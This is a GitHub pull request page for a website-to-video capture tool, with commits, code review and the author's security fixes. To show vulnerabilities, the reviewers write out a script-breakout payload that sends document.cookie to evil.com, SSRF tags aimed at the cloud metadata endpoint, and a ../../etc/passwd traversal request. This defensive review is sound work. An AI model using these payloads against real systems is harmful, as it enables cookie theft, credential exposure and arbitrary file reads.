feat: website capture pipeline + 7-step video production skill by ularkim · Pull Request #284 · heygen-com/hyperframes

ularkim · 2026-04-15T18:13:06Z

What

Full website-to-video pipeline: npx hyperframes capture <URL> extracts a site's design system, assets, and screenshots, then the /website-to-hyperframes skill guides an AI agent through a 7-step workflow (capture → DESIGN.md → script → storyboard → VO → build → validate) to produce a professional video.

Why

There was no way to go from a URL to a video. Users had to manually screenshot sites, pick colors, find assets, and figure out the creative direction themselves. This automates the entire pipeline — a single prompt like "Create a 25-second product launch video from https://stripe.com" should produce production-quality output.

How

Capture pipeline (packages/cli/src/capture/):

Puppeteer-based extraction: design tokens (colors as HEX, fonts, headings, CTAs, sections), visible text, animations catalog, WebGL shaders, Lottie manifests
Asset downloading with DOM context enrichment (alt text, nearest heading, section classes, above-fold detection)
Scroll-position screenshots (5 viewports at 0/25/50/75/100% scroll) + per-section viewport tiles (up to 24)
Optional Gemini 2.5 Flash vision captioning for downloaded images (GEMINI_API_KEY env var)
Auto-generates a CLAUDE.md for the captured site so any agent session can pick up the project

Snapshot command (packages/cli/src/commands/snapshot.ts):

npx hyperframes snapshot <dir> --at 2.9,10.4,18.7 for visual self-verification
Bundles project HTML, serves locally, launches headless Chrome, seeks to timestamps, captures PNG frames
Used by Step 7 (validate) so the agent can visually verify its own output

7-step skill workflow (skills/website-to-hyperframes/):

Step 1: Capture & understand (write-down-and-forget method for context management)
Step 2: Write DESIGN.md (6-section brand reference, ~90 lines)
Step 3: Write SCRIPT (narration with 2.5 words/sec pacing)
Step 4: Write STORYBOARD (creative north star — concept-first, cinematic, 8-10 elements per beat)
Step 5: Generate VO + map timing (ElevenLabs TTS, word-level timestamps)
Step 6: Build compositions (static layout first, then animate, asset cross-reference)
Step 7: Validate & deliver (lint, validate, snapshot verification, HANDOFF.md)
10 visual techniques reference with copy-pasteable code patterns

GSAP lint rule (packages/core/src/lint/rules/gsap.ts):

Extended gsap_css_transform_conflict to detect inline style="transform:..." attributes
Indexes all classes on an element (not just the first) for accurate conflict detection

Notable decisions:

Storyboard-driven, not DESIGN.md-driven — DESIGN.md is a brand cheat sheet, the storyboard is the creative north star
No checklist in the skill — tested across 6 iterations; checklists killed creativity (agents spent context checking boxes instead of building interesting compositions)
Gemini captioning is optional and gracefully degrades — Promise.allSettled handles individual failures
Captions are optional (only built if user requests) to reduce overhead

Test plan

Manual testing: 6 iterations across Stripe and Railway websites with full pipeline execution
CLI type-checks clean (tsc --noEmit — pre-existing errors in verify/index.ts only)
Lint + format pass (oxlint + oxfmt via lefthook pre-commit)
Code review: 16 bugs found and fixed (path traversal, browser leak, div-by-zero, dead code, wrong API config, broken skill references)
All skill file cross-references verified (transitions/catalog.md, shader-setup.md, techniques.md, etc.)
Unit tests for inline-style GSAP lint detection (identified gap, not yet written)
Documentation updated (CLAUDE.md aligned with main, AGENTS.md untouched)

🤖 Generated with Claude Code

Adds `hyperframes capture <url>` command that extracts a complete design system from any website, producing AI-agent-ready output: - Full-page screenshot (lazy-load aware, nav at top) - AI-generated DESIGN.md via Claude API (colors, typography, elevation, components, do's/don'ts) with programmatic asset catalog (136+ assets with HTML context annotations like img[src], css url(), link[rel=preload]) - CSS-purged compositions (87% size reduction via PurgeCSS) - HTML-prettified compositions (one-tag-per-line for AI readability) - CLAUDE.md + .cursorrules auto-generated for AI agent instructions - Asset deduplication (srcset variants) and tracking pixel filtering

…ment - switch to gemini 3.1 pro (gemini-3.1-pro-preview) with claude fallback - playwright for full-page screenshots (fixes puppeteer gradient/fixed bugs) - replica refinement loop: generate, screenshot, compare, fix - extract inline svgs (50 max, 10kb each) to assets/svgs/ - extract visible text in dom order for content accuracy - detect js libraries (gsap, three.js, scrolltrigger) via globals - improved asset catalog grouping and naming - reverse-engineered aura system prompt documentation - comprehensive session handoff doc Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

- key finding: team already wants DESIGN.md integration (James, Bin, Vance) - skills quality matters enormously - must invoke /hyperframes-compose - eval infrastructure exists (Abhay's dashboards, Teodora's 78-criteria guide) - templates at templates/ need study before finalizing skill - session handoff updated with critical next steps

Captures Lottie animations via network interception and WebGL shader source via gl.shaderSource hooking during site crawl. Updates website-to-hyperframes skill with asset planning guidance, Lottie/shader reading instructions, and stronger creative direction for scene planning. Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

Capture pipeline: - Remove dead deps (puppeteer-extra, stealth plugin, duplicate devDeps) - Remove duplicate generateAgentPrompt() call (first lied about DESIGN.md) - Remove dead canvas-to-image code in htmlExtractor (post canvas removal) - Parallelize image downloads (batches of 5 via Promise.allSettled) - Fix pre-existing TS error (match[1] guard in font downloader) - Default capture output to captures/<hostname> Skill creative overhaul: - Add shader transition selection to creative director step (Step 4) - Add shader wiring instructions to engineer step (Step 5) - Replace 4-line energy modifiers with visual vocabulary table - Strip rigid scene-by-scene templates from video-recipes.md - Strip example fill data from scene plan tables - Add "read transition refs before planning" instruction - Add creative ambition language ("how the hell did they make this") Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Comprehensive redesign of website-to-hyperframes skill and capture pipeline based on code review findings and Claude Code architecture research. Key changes: remove AI auto-generation, restructure skill into phases, embed shader boilerplate in scaffold, fix color format. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

13-task plan covering: capture pipeline cleanup (remove AI generation, fix colors to HEX, add asset descriptions, shader-ready scaffold), skill restructuring (4 phases with artifact gates), and compose skill Visual Identity Gate upgrade. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

… descriptions

…trator

- Remove orphaned `false` argument in generateAgentPrompt call (critical: was shifting hasLottie, hasShaders, catalogedAssets parameters) - Add HSL color handling in rgbToHex via temp element resolution - Remove build artifact commit section from phase-4-build.md - Fix __GSAP_TIMELINE reference to __timelines Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

…criptions - Double-escape regex in tokenExtractor template literal (\s→\\s, \d→\\d, \(→\\() so browser receives valid regex patterns via page.evaluate() - Simplify index.html scaffold: scene slots + audio + timeline + comment pointing to shader-setup.md reference (no broken inline shader boilerplate) - Fix asset descriptions: use CatalogedAsset.contexts/notes instead of nonexistent htmlContext field Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Code fixes: - snapshot.ts: path traversal guard, browser leak (try/finally), div-by-zero for --frames 1, port bind error handling, rAF-based render settle - index.ts: remove invalid thinkingConfig for gemini-2.5-flash, fix Gemini batch/rate-limit comments, fix video preview viewport y-coordinate - tokenExtractor.ts: remove dead seen[si] dedup code - gsap.ts: index ALL classes for inline-style transform conflict detection Skill architecture rewrite (4-phase → 7-step): - Replace phase-1 through phase-4 with step-1 through step-7 - Add techniques.md (10 visual techniques with code patterns) - Fix /hyperframes-compose → /hyperframes (skill doesn't exist) - Fix captures/arc-browser reference → shader-setup.md (file doesn't exist) - Fix step-7 hardcoded captures/stripe path - Document Gemini API free/paid rate limits in step-1 Cleanup: - CLAUDE.md: restore from Stripe-capture overwrite, update 4-phase → 7-step - .gitignore: add PR #267 skills (hyperframes-animation-map, hyperframes-contrast) - Delete old phase-*.md, animation-recreation.md, tts-integration.md Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Remove files that shouldn't ship in this PR: - docs/research/ (aura analysis, prompt catalogs) - docs/session-*.md, docs/SESSION-HANDOFF.md (dev notes) - docs/superpowers/ planning and spec docs - pnpm-lock.yaml at root and cli (repo uses bun, not pnpm) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

…ames mention Main PR #283 removed the full skills table from CLAUDE.md and moved it to AGENTS.md. Align with that decision: use main's slim dev-focused format, fix pnpm→bun references, add one-line /website-to-hyperframes pointer. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

The capture command was registered in cli.ts but missing from the help groups, so it wouldn't appear in `hyperframes --help`. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

The lockfile was stale after rebasing onto main — bun install --frozen-lockfile failed in CI because new dependencies (google/genai, patchright, purgecss) weren't reflected in the lockfile. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

vanceingalls · 2026-04-15T20:33:19Z

+>
+  $1.9T
+</div>
+


Contradicts step-6-build.md rule. This code example uses left:50%;transform:translateX(-50%) for centering — the exact pattern that step-6-build.md:133 explicitly forbids:

Never use ANY CSS transform for centering — not translate(-50%, -50%), not translateX(-50%). GSAP animates the transform property, which overwrites ALL CSS transforms including centering. The element flies offscreen.

The linter also catches this (gsap_css_transform_conflict), and the new inline-style detection in this same PR would flag it. Fix to flexbox centering:

<div style="position:absolute;top:280px;left:0;width:100%; display:flex;justify-content:center;"> <div id="hero-stat" style="font-size:200px;font-weight:900;color:#fff;opacity:0;"> $1.9T </div> </div>

Same fix needed for the #label element a few lines below.

vanceingalls · 2026-04-15T20:33:34Z

+        if (root) return parseFloat(root.getAttribute("data-duration") ?? "0");
+        const tls = win.__timelines;
+        if (tls) {
+          for (const key in tls) {


Same duration function bug. This is the same pattern flagged in the other inline review — win.__player.duration may be a GSAP method reference (truthy but not a number), which propagates to the seek positions as NaN. Same fix:

const d = win.__player?.duration; if (d != null) return typeof d === "function" ? d() : d;

vanceingalls · 2026-04-15T20:33:44Z

+      res.end();
+      return;
+    }
+    if (existsSync(filePath)) {


POSIX-only path traversal guard — third instance. Same pattern flagged on capture/index.ts and verify/index.ts. projectDir + "/" breaks on Windows where the separator is \. All three should share a single helper:

import { relative, isAbsolute } from "node:path"; function isInsideDir(base: string, target: string): boolean { const rel = relative(base, target); return !rel.startsWith("..") && !isAbsolute(rel); }

vanceingalls · 2026-04-15T20:34:07Z

+notion-ai-agents/
+stripe-launch/
+stripe-investor/
+stripe-website/


20 hardcoded test capture directories. These are the author's local test artifacts — notion-promo/, stripe-launch/, arc-browser/, lusion-brand/, etc. They'll grow with every test run and don't belong in the repo's gitignore. Replace with a generic pattern:

# Capture outputs captures/ *-capture/

Or add them to .git/info/exclude if they're local-only.

vanceingalls · 2026-04-15T20:34:15Z

+    "purgecss": "^8.0.0"
+  },
  "devDependencies": {
    "@commitlint/cli": "^20.5.0",


Root production dependencies that only the CLI uses. patchright and purgecss are added here but only packages/cli uses them. purgecss is already in packages/cli/package.json. Move patchright to the CLI package and remove both from root — this avoids bloating bun install for anyone working on core, engine, player, etc.

vanceingalls · 2026-04-15T20:34:24Z

Hard dependency for optional Gemini captioning. The PR description says "Gemini captioning is optional and gracefully degrades" with Promise.allSettled. But @google/genai is a non-optional dependency here — it gets installed for every user even if they never set GEMINI_API_KEY. Dynamically import with try/catch instead, or move to optionalDependencies.

vanceingalls · 2026-04-15T20:34:33Z

    "postcss": "^8.5.8",
-    "puppeteer-core": "^24.39.1"
+    "prettier": "^3.8.1",
+    "puppeteer-core": "^24.39.1",


CLI now depends on both puppeteer-core AND playwright. screenshotCapture.ts uses Playwright for captureFullPageScreenshot while everything else uses Puppeteer. That's ~200MB+ of extra browser binaries for one function. Either migrate the full-page screenshot to Puppeteer's page.screenshot({ fullPage: true }) (which already works), or move everything to Playwright. Having both is costly for install size and maintenance.

vanceingalls · 2026-04-15T20:34:51Z

+- **Kokoro** (offline last resort — has Python dependency issues on many systems) — `npx hyperframes tts SCRIPT.md --voice af_nova --output narration.wav`. Only try this if ElevenLabs and HeyGen are unavailable.
+
+Pick the voice that sounds most natural and conversational. Listen for pacing — does it breathe between sentences? Does it sound like a person or a robot?
+


TTS ranking contradicts CLAUDE.md and the hyperframes skill. ElevenLabs is listed as "recommended" here, with Kokoro relegated to "offline last resort — has Python dependency issues." But the project's CLAUDE.md documents Kokoro-82M as the primary TTS tool (npx hyperframes tts), and references/tts.md in the hyperframes skill is entirely Kokoro-focused.

An agent following this skill will skip the built-in tool in favor of an external API that requires auth setup. The ranking should either:

Put Kokoro first (it's built-in, no API key, no auth)

Or explicitly state when to prefer ElevenLabs over Kokoro (e.g., "when voice quality matters more than setup speed")

Also: the note says HeyGen TTS "returns word timestamps automatically" — that's exactly what downstream steps need for beat mapping. If timing is the priority, HeyGen should rank above ElevenLabs, not below it.

Review fixes (16 comments from jrusso1020 + vanceingalls): - screenshotCapture: remove Playwright dep, use Puppeteer for all screenshots - screenshotCapture: dynamic screenshot count based on page height (30% overlap) - snapshot.ts: fix duration() function-vs-property bug, cross-platform path guard - htmlExtractor: fix code injection via parameterized evaluate - index.ts: video preview re-measures position after scroll, .env file loading - capture.ts: BLOCKED.md on timeout failures - gsap.ts: 5 inline-style lint tests added (all pass) - Remove Playwright, patchright deps; @google/genai to optionalDependencies - Gitignore: generic patterns instead of 20 hardcoded directories - Remove asset-sourcing.md, video-recipes.md (unused, duplicated guidance) Capture quality improvements (tested on 10+ websites): - Color extraction: canvas-based oklch/lab resolver, pixel sampling via elementFromPoint, broad sweep for accent colors, gradient/shadow extraction - Section detection: broadened selectors for div-based layouts, height cap to skip page-level wrappers, parent bg walkup for dark sites - Font downloads: cap 6 per family / 30 total (Cal.com: 306→30) - CTA detection: text pattern matching + nav context filtering - Heading text: innerText with whitespace normalization - Gemini captioning: maxOutputTokens 100→300, .env auto-loading - .env.example updated with GEMINI_API_KEY docs - TTS ranking: Kokoro first with Python 3.10+ note

ularkim · 2026-04-16T01:25:26Z

Review Response

Addressed all 16 comments in commit 6266708. Here's the summary:

Fixed ✅

#	Issue	Fix
1	Playwright browser leak	Removed Playwright entirely — all screenshots now use Puppeteer
2	Video preview stale coords	Re-measures position after scroll via `getBoundingClientRect()`, seeks to 0.1s for decoder
3/10	`duration` function bug	`typeof d === "function" ? d() : d` check
4/11	Path traversal Windows	`path.relative` + `isAbsolute` check
5	No inline-style lint tests	5 tests added (translate, scale, rotate no-FP, multi-class, dual style+inline)
7	Duplicated guidance	Removed `video-recipes.md` and `asset-sourcing.md` (sources of duplication)
8	Code injection htmlExtractor	Parameterized `page.evaluate(fn, href)` instead of string interpolation
9	video-recipes contradiction	File removed (the translateX centering example is gone)
12	20 hardcoded gitignore entries	Replaced with generic patterns (`-capture/`, `-demo/`, etc.)
13	Root deps	Removed `patchright` (dead dep — never imported), `purgecss` already in CLI
14	`@google/genai` hard dep	Moved to `optionalDependencies`
15	Puppeteer + Playwright	Removed Playwright entirely — screenshots use Puppeteer with dynamic viewport tiling
16	TTS ranking	Kokoro first (free, built-in) with Python 3.10+ requirement noted and ElevenLabs/HeyGen as fallbacks

Deferred to follow-up PR

#	Issue	Reason
6	Split index.ts (1126 lines)	Significant refactor risk in same PR as 15+ other changes. Will do as immediate follow-up.

Additional improvements in this commit

Color extraction: canvas-based oklch/lab resolver, pixel sampling via elementFromPoint, gradient/shadow color extraction
Section detection: broadened selectors, height cap for page wrappers, parent bg walkup
Font downloads: capped at 6/family, 30 total (Cal.com: 306→30)
CTA detection: text pattern matching + nav context filtering
Screenshots: dynamic count based on page height (30% overlap), removed section tiling
Gemini captioning: .env auto-loading, maxOutputTokens 100→300
BLOCKED.md: written on timeout/anti-bot failures

Tested on 10+ websites: Linear, Cal.com, Tailwind CSS, Supabase, Basecamp, Dribbble, Notion, Resend, Midjourney, Dub.co, Shopify, Vercel.

vanceingalls

All 16 review items from both passes have been addressed in 6266708. Nice work.

One fix needed before merge — CI is red:

verify/index.ts:132,137 — noUncheckedIndexedAccess: true means sections[i] is SectionResult | undefined. Add a guard:

const section = sections[i];
if (!section) continue;

Minor (not blocking): verify/index.ts file server (~line 95) has no path traversal guard — same join(projectDir, url) pattern that was fixed in snapshot.ts. Low risk (localhost, random port, short-lived) but worth matching the fix pattern from snapshot.ts:

const rel = relative(projectDir, filePath);
if (rel.startsWith('..') || isAbsolute(rel)) { res.writeHead(403); res.end(); return; }

Everything else looks solid — parameterized evaluate, Playwright removal, optional Gemini dep, TTS ranking, lint tests, gitignore patterns all check out.

jrusso1020

Staff-Engineer Second Pass Review

The fix commit (6266708) addressed the majority of the first-round feedback well — credit to @ularkim for taking it seriously. Browser leak, code injection, duration bug, path traversal in snapshot.ts, GSAP lint tests, Playwright removal, TTS ranking, and the video-recipes.md duplication source are all resolved. Solid work.

That said, a few items remain open from the first round, and the fix commit introduced one new regression.

Still Open — Must Fix Before Merge

1. verify/index.ts — path traversal (security)
The file server has no path traversal guard. req.url is decoded and join()-ed to projectDir without checking whether the result escapes the directory. This was fixed in snapshot.ts but NOT here — same bug, same pattern. Needs the same relative() + isAbsolute() guard that snapshot.ts now has. Lift it into a shared helper since it's needed in two places.

2. capture/index.ts — still 1,175 lines
The modularity concern was acknowledged but not addressed. The file orchestrates browser launch, WebGL hooks, Lottie interception, animation cataloging, HTML extraction, token extraction, video manifest, text extraction, Gemini captioning, asset descriptions, section splitting, CSS purging, and project scaffolding — in one function. The ═══ comment banners are literally the module boundaries waiting to become files. This is the single biggest maintainability risk in the PR and will make the next bug in this pipeline painful to isolate.

3. package.json — adm-zip removed but still dynamically imported (regression)
The fix commit removed adm-zip from dependencies, but index.ts still dynamically imports it for .lottie file extraction (const AdmZip = (await import("adm-zip")).default). This will crash at runtime when a captured site has Lottie animations packaged as .lottie files. Either restore the dependency or remove the dead code path.

Should Fix

4. Lottie JSON injection in index.ts
Raw Lottie JSON file content (animJson) is interpolated directly into a <script> tag template literal: animationData:${animJson}. A malicious Lottie file could break out of the JS expression. Low blast radius (headless Chrome, short-lived), but still a code injection vector. Use JSON.stringify() to safely embed it.

5. Step-4 contradiction on technique count
step-4-storyboard.md says "Pick 2-3 per beat" (so 16-24 technique uses for an 8-beat video) but the global guardrails in the same file say "Use at least 2-3 different techniques across the video" (only 2-3 total). These are 10x apart. The per-beat guidance matches the surrounding context — tighten the global guardrail phrasing to match.

6. .env.example removed ANTHROPIC_API_KEY
The old file had ANTHROPIC_API_KEY for "AI-assisted composition via MCP." This PR replaces it with GEMINI_API_KEY. If MCP composition is still a feature (and it is), new contributors won't discover it. Keep both keys listed.

7. Step-6 asset presentation recommends transform: perspective(...) as static CSS
This directly conflicts with the "GSAP overwrites ALL CSS transforms" rule in the same file's Critical Rules section. If an agent applies this tilt AND then animates with GSAP, the tilt vanishes. Should recommend gsap.set() instead for elements that will be animated.

8. step-1-capture.md leads with Gemini API key
The capture works fully without any API key — DOM-context descriptions (alt text, nearest heading, section classes, above-fold) are the zero-config default, and @google/genai is correctly in optionalDependencies. But the skill doc's first paragraph leads with the Gemini key, which can give agents (or users) the impression it's required. Suggest reordering to lead with the zero-config path:

npx hyperframes capture <URL> -o captures/<project-name>
No API keys required. The capture extracts design tokens, screenshots, fonts, and assets with DOM-context descriptions automatically.

Optional: Set GEMINI_API_KEY for richer AI-powered image descriptions via Gemini 2.5 Flash vision.

Nits

~15 silent catch {} blocks in index.ts swallow errors without pushing to warnings[] — users won't know why a capture is incomplete
snapshot.ts CLI help uses hardcoded captures/stripe — captures/<project> would be more consistent with skill docs
visual-style.md vs visual-styles.md disambiguation exists but is buried in a parenthetical — could be a standalone callout

Verdict

Three items remain blocking: the verify/index.ts path traversal (#1, security), adm-zip runtime crash (#3, regression from the fix commit), and index.ts modularity (#2, maintainability). The first two are quick fixes; #2 is the real question — gate merge or track as immediate follow-up.

Everything else from the first round was resolved well. The overall feature design is strong.

Review round 2 fixes (jrusso1020 + vanceingalls): - verify/index.ts: add path traversal guard (relative + isAbsolute) - verify/index.ts: fix sections[i] undefined typecheck error (CI green) - index.ts: escape Lottie JSON with \u003c to prevent </script> breakout - step-4-storyboard: fix technique count contradiction (2-3 per beat, not across whole video) - step-6-build: perspective tilt uses gsap.set() instead of CSS transform (avoids GSAP overwrite conflict) - step-1-capture: reorder — command first, Gemini note after (zero-config is the default path, API key is optional enhancement) - step-7-validate: add tsx fallback for snapshot command - step-3-script: vary hook patterns, don't default to number every time - assetDownloader: exempt SVGs from 10KB minimum filter (company logos like Hubspot/Intel/DHL are 2-6KB; HeyGen capture: 13→75 assets) Note: adm-zip was NOT removed (reviewer #3) — it's still in packages/cli/package.json:30. The root package.json had patchright and purgecss removed, not adm-zip. Note: ANTHROPIC_API_KEY not restored in .env.example — grep confirms zero references in the entire codebase. The @anthropic-ai/sdk dependency was removed earlier in this branch.

miguel-heygen

Third-pass review — focused on issues not covered by James's or Vance's reviews. All their feedback still stands. The latest commit (6266708) correctly addresses all previously flagged items (verified each fix).

Must fix before merge

SSRF via unrestricted fetch() in asset downloads and CSS fetching — fetchBuffer() and the stylesheet fetch in htmlExtractor.ts follow any URL from the target page, including cloud metadata endpoints (169.254.169.254), internal services, and localhost. Inline on assetDownloader.ts.
JS injection via Lottie JSON interpolated into setContent — raw fetched JSON is template-literal'd directly into a <script> block. A crafted Lottie file can break out of the JS context. Inline on index.ts.
verify/index.ts file server has no path traversal guard — the fix applied to snapshot.ts was not applied here. Inline.

Should fix

Unbounded response body in Lottie interception — response.buffer() downloads the full body before size-checking. Inline on index.ts.
adm-zip used at runtime but missing from dependencies — index.ts dynamically imports adm-zip to extract dotLottie ZIP files. The try/catch prevents crashes, but dotLottie extraction silently fails. Should be in optionalDependencies (like @google/genai) or a regular dep.
Manual .env parsing is fragile — hand-rolled parser doesn't handle edge cases and modifies process.env as a side effect. Inline on index.ts.

Smaller items (not blocking)

Lottie dedup uses jsonData.slice(0, 200) as a "hash" — files with identical headers get falsely deduped
maxScreenshots param accepted but unused (underscore-prefixed); cap hardcoded at 20 in screenshotCapture.ts
prettier (14MB+) is a regular dep but only used optionally in cssPurger.ts — should be optionalDependencies
Duplicate slugify() in assetDownloader.ts and compositionGen.ts
CDP session from animationCataloger.ts is disabled but never detached

Verification of fixes from commit `6266708`

All 7 previously flagged items verified as correctly fixed:

htmlExtractor.ts injection: parameterized page.evaluate
screenshotCapture.ts: Playwright removed, Puppeteer only
snapshot.ts duration(): typeof d === "function" check
snapshot.ts path traversal: relative() + isAbsolute()
GSAP lint tests: 5 new tests added
.gitignore: generic patterns
@google/genai: optionalDependencies

miguel-heygen · 2026-04-16T02:50:57Z

+  try {
+    const res = await fetch(url, {
+      signal: AbortSignal.timeout(10000),
+      headers: { "User-Agent": "HyperFrames/1.0" },


SSRF via unrestricted fetch(). fetchBuffer() follows any URL passed to it — including cloud metadata endpoints, internal services, and localhost. Since the capture pipeline navigates to arbitrary user-provided URLs and then fetches derived URLs (stylesheets, images, Lotties) server-side, a malicious site can embed:

<link rel="stylesheet" href="http://169.254.169.254/latest/meta-data/"> <img src="http://internal-service:8080/admin/secrets">

...and this function will fetch them and save the response to disk.

Fix: Add URL validation before fetching. At minimum reject private IP ranges (10.x, 172.16-31.x, 192.168.x, 127.x, 169.254.x), non-HTTP(S) schemes, and localhost. Apply the same check in the CSS fetch in htmlExtractor.ts and the Lottie download in index.ts.

miguel-heygen · 2026-04-16T02:50:57Z

+                `<!DOCTYPE html>
+<html><head>
+<script src="https://cdnjs.cloudflare.com/ajax/libs/lottie-web/5.12.2/lottie.min.js"></script>
+<style>*{margin:0;padding:0;background:transparent}#c{width:400px;height:400px}</style>


JS injection via Lottie JSON interpolated into setContent. animJson is raw content fetched from the target website, directly interpolated into a <script> block via template literal (animationData:${animJson}). A crafted Lottie JSON with a nm field containing </script><script>fetch('http://evil.com/'+document.cookie)// would escape the script tag and execute arbitrary code in the Puppeteer page context.

Fix: Load the page shell first via setContent (without the data), then pass the animation data via parameterized page.evaluate() — same pattern used for the htmlExtractor fix.

miguel-heygen · 2026-04-16T02:50:57Z

+      let content = readFileSync(filePath);
+      let contentType = getMimeType(filePath);
+
+      // For composition HTML files: unwrap <template> for standalone rendering


Path traversal — missing guard. The fix applied to snapshot.ts (using relative() + isAbsolute()) was not applied here. A request to ../../etc/passwd would read arbitrary files. The server only listens on 127.0.0.1 on an ephemeral port, so exploitation requires local access — but the pattern is identical to what was already fixed in snapshot.ts.

Fix: Add the same guard after the join() call:

const rel = relative(projectDir, filePath); if (rel.startsWith('..') || isAbsolute(rel)) { res.writeHead(403); res.end(); return; }

miguel-heygen · 2026-04-16T02:50:57Z

+
+        if (isJsonUrl || isJson) {
+          const buffer = await response.buffer();
+          if (buffer.length < 100 || buffer.length > 5_000_000) return; // Skip tiny or huge


Unbounded response body in Lottie interception. response.buffer() downloads the entire response body into memory before the size check on the next line. A site serving a multi-GB response on a .json URL would OOM before the 5MB guard runs.

Fix: Check Content-Length header first when available:

const cl = parseInt(response.headers()['content-length'] || '0', 10); if (cl > 5_000_000) return;

miguel-heygen · 2026-04-16T02:50:57Z

+  };
+
+  // Load .env file from repo root if it exists (for GEMINI_API_KEY, etc.)
+  try {


Manual .env parsing is fragile. This hand-rolled parser walks up 5 parent directories looking for .env and modifies process.env as a side effect. It doesn't handle multi-line values, comments after values (KEY=val # comment includes the comment), or escaped quotes. Bun has built-in .env support — if the capture command runs via npx hyperframes capture, bun loads .env automatically. If the manual parser is needed for a specific reason (e.g., output dir differs from repo root), worth documenting that.

Mechanical extraction, zero logic changes. New files: - mediaCapture.ts (345 lines): Lottie preview, video manifest/screenshots - contentExtractor.ts (314 lines): library detection, text, Gemini, asset descriptions - scaffolding.ts (135 lines): .env loading, project scaffold generation Also fixes false-positive BLOCKED.md with structural Cloudflare detection. Tested on 20 websites, pre/post output identical.

…gecss) The --split feature auto-generates compositions from captured HTML — a different approach from the /website-to-hyperframes skill workflow where agents build compositions from scratch using the storyboard. No skill file, no step reference, and no test session ever used --split. Removes 923 lines of unused code + purgecss dependency. Backed up to ~/Desktop/capture-split-backup/ for reference.

- assetDownloader: add isPrivateUrl() guard blocking private IP ranges (127.x, 10.x, 172.16-31.x, 192.168.x, 169.254.x), cloud metadata endpoints, localhost, and non-HTTP schemes - mediaCapture: fix Lottie JSON injection by loading shell HTML first then passing animation data via parameterized page.evaluate() - index.ts: check Content-Length header before response.buffer() in Lottie network interception to avoid OOM on multi-GB responses

Security (from miguel-heygen review): - assetDownloader: export isPrivateUrl() SSRF guard - htmlExtractor: add isPrivateUrl check before CSS fetch - mediaCapture: add isPrivateUrl check before Lottie fetch - mediaCapture: fix previewPage leak (try/finally) - mediaCapture: skip Lottie files > 2MB for preview (CDP limit) - contentExtractor: skip images > 4MB for Gemini captioning - index.ts: check Content-Length before response.buffer() (OOM guard) - snapshot.ts: register error handler before server.listen() Capture improvements: - Default timeout 30s to 120s (Shopify needs ~90s for Cloudflare) - step-6-build: sub-agent dispatch template with explicit rules: pass file PATHS not contents, use local fonts not Google Fonts, verify ../assets/ references after each beat

ularkim · 2026-04-16T13:16:16Z

Review Response — Round 3

Five new commits addressing @miguel-heygen's security review + @jrusso1020's modularity concern:

Security fixes (`48ec6a0`, `44b9cbd`)

SSRF protection: isPrivateUrl() guard now applied to all 3 fetch sites (assetDownloader, htmlExtractor CSS fetch, mediaCapture Lottie fetch). Blocks private IPs (10.x, 172.16-31.x, 192.168.x, 169.254.x), cloud metadata, localhost.
Lottie injection: Parameterized page.evaluate() — animation data passed as function arg, not interpolated into script tag
OOM guard: Content-Length check before response.buffer() in Lottie interception
Preview page leak: try/finally on Lottie preview rendering
File size guards: Skip Lottie > 2MB for preview, skip images > 4MB for Gemini captioning
Server error handler: Registered before listen() in snapshot.ts

Modularity (`3b2e1cb`)

Split capture/index.ts from 1,175 → 566 lines:

mediaCapture.ts (345 lines) — Lottie preview, video manifest
contentExtractor.ts (314 lines) — library detection, text, Gemini, asset descriptions
scaffolding.ts (135 lines) — .env loading, project scaffold

Cleanup (`be0f194`)

Removed --split flow entirely (splitter/, verify/, cssPurger.ts, purgecss dep) — 1,052 lines deleted. Not used by the /website-to-hyperframes skill workflow.

Other (`0f3c88d`, `44b9cbd`)

Default timeout 30s → 120s (Shopify needs ~90s for Cloudflare)
Sub-agent dispatch instructions in step-6: pass file PATHS not contents, use local fonts not Google Fonts, verify asset refs after each beat
verify/index.ts typecheck fix + path traversal guard (before deletion)
Step-4 technique count contradiction fixed
Step-6 perspective tilt uses gsap.set() instead of CSS transform
Step-1 reordered: command first, Gemini note after

Re: `adm-zip` (#3 from round 1)

adm-zip was not removed — it's still in packages/cli/package.json:30. The root package.json had patchright and purgecss removed, not adm-zip.

Re: `ANTHROPIC_API_KEY` (#6 from round 2)

Grep confirms zero references to ANTHROPIC_API_KEY in the entire codebase. The @anthropic-ai/sdk dependency was removed earlier in this branch. Not restoring a dead env var.

CI fully green (Build, Format, Lint, Test, Runtime contract, Typecheck all pass).
Tested on 20 websites across 3 rounds.

jrusso1020

looks good!

jrusso1020 · 2026-04-16T16:32:09Z

+If the built CLI isn't available, fall back to:
+
+```bash
+npx tsx packages/cli/src/cli.ts capture <URL> -o captures/<project-name>
+```


slight nit but we probably don't need this here?

Oh yeah we don't it was necessary cause the published package didn't have it haha

Critical: asset cataloger now runs BEFORE extractHtml which converts img src to data URLs. Framer sites like heykuba.com went from 2 to 78 images. - networkidle2 instead of networkidle0 (unblocks SPAs with WebSockets) - Lazy-load wait: scroll to bottom, wait for img.complete - CSS background-image cataloging for Framer/Webflow - SVG naming: checks class, id, parent, inner text (not just aria-label) - Gemini batch 5->20, pause 12s->2s (paid tier: 2000 RPM, ~0.001/img) - maxOutputTokens 300->500, descriptions sorted captioned-first - Remove tsx fallback from step-1 (reviewer nit, published CLI has it) Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

ularkim · 2026-04-16T17:58:33Z

Latest push (`8af3814`) — Capture quality fixes

Found and fixed a critical ordering bug: extractHtml converts all <img src> to data: URLs (for offline HTML export), and the asset cataloger was running AFTER it — finding only data: URLs and skipping them. Framer sites like heykuba.com went from 2 images → 78 images after moving the catalog before the mutation.

Changes

Catalog before DOM mutation — read-only operations (tokens, catalog, screenshots, text) now run before extractHtml which mutates the DOM
